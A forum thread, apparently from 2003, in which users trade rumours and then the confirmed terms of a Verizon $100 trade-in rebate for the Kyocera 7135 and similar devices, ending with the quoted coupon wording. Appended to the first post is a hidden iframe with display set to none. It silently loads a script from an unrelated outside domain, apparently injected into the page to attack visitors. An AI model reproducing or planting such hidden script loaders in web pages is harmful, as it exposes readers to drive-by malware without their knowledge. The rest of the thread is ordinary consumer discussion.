Anyone hear any rumors of when Kyocera will be doing another mail-in rebate for the 7135? I missed the last one.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Hmmm...I don't know. There might not be any more planned, as the 7135 is starting to pick up in popularity. I do know that if you've had the same Verizon phone for 2 years, you can get $100 off on the "New Every Two" program. Good luck!
On the SmartPhoneSource boards (which are down right now) someone said that the $100 would be from 8/18/03-8/31/03. I was very interested in that information because I started my 15 day trial on 8/9. The poster that first mentioned the deal was given the info by his Verizon rep in another state (I don't remember which; I live in Kansas.)
Two other SmartPhoneSource forum members posted to say that they had called their own Verizon reps and verified the deal. One was eligible, one was not.
I called my Verizon guy, and he was unaware of the deal but promised to honor it.
(I'm very happy with my phone and will keep it past the 15 day trail period, whether or not I get the $100 deal.... but it would take a nice bite out of the cost. I'm also selling my old Clié, so that should help.)
I anxiously went to the SmartPhoneSource board today to see if there was a link or more info; the board is down, so I'm going to try to find out what I can by calling Verizon and doing some surfing. If I find a link to the deal, I will post it here. I hope if someone else finds it first, they will do the same.
The people I read on the other boards about the rebate had checked with their Verizon Dealers if they would give the reabate if offered and they were still in their 15 day window. I only read about the one person who had heard about the existance of the rebate.
I just called 800-2-JOIN-IN and asking if they were offering a rebate on the Kyocera 7135... I was put on hold and after about 2 minutes, was told "We don't have the $100 rebate..." Funny thing was I didn't say it was a $100 rebate...
Anyhow, I can't get it (if it exists) over the phone... I did say I was in California, so it may depend on where you are...
I plan on visiting a local store this week to see if they know anything.
My friendly Verizon guy called today out of the blue: he found the internal company e-mail that gave details about the $100 trade-in deal. I asked if he could send me a copy of the original e-mail.
Last night he faxed the coupon. After reading it, it looks like he gave me a deal. I bought new service and did not have a qualifying device to trade in.
-Offer applies to a new Blackberry 6750, Samsung i700, or Kyocera 7135.
-Purchase item between 8/18/03-10/31/03
-$100 credit on trade in of an Audiovox Thera, Kyocera 6035, a Blackberry, a Treo, or a Toshiba 2032 NOT ALREADY ACTIVATED ON WITH VERIZON WIRELESS.
I have scanned his fax and will attempt to post the two pages in a new message below.

Yeah... if you get the details, let us know. I went into my local store and didn't see anything posted. The line was too long, so I didn't get to ask anyone.
...to Verizon rebate coupons. I posted them elsewhere--contact me for the link.
I have been having ISP problems, so if you asked me for the coupons and have not received them, please send me a message. In particular, "Mary"...I deleted your e-mail address by mistake.
"When you purchase a new Blackberry 6750, Samsung i700, or Kyocera 7135 between August 18th, 2003 and October 31st, 2003 and either sign up for a 1 or 2 year Unlimited Blackberry solution Calling plan or Unlimited Wireless Sync Calling Plan, or add the Unlimited Blackberry featue plan or Unlimited Wireless Sync Feature Plan to an eligible 1 or 2 year calling plan, you can trade-in your qualifying device and receive a $100 rebate towards the purchase of your new equipment. A qualifying trade in device is a working 1) Audiovox Thera or Kyocera 6035; or 2) Blackberry handheld, Handspring Treo, or Toshiba 2032 not activated onVerizon Wireless service."
There it is.... Kinda sucks since I don't have a qualifying device to trade in....
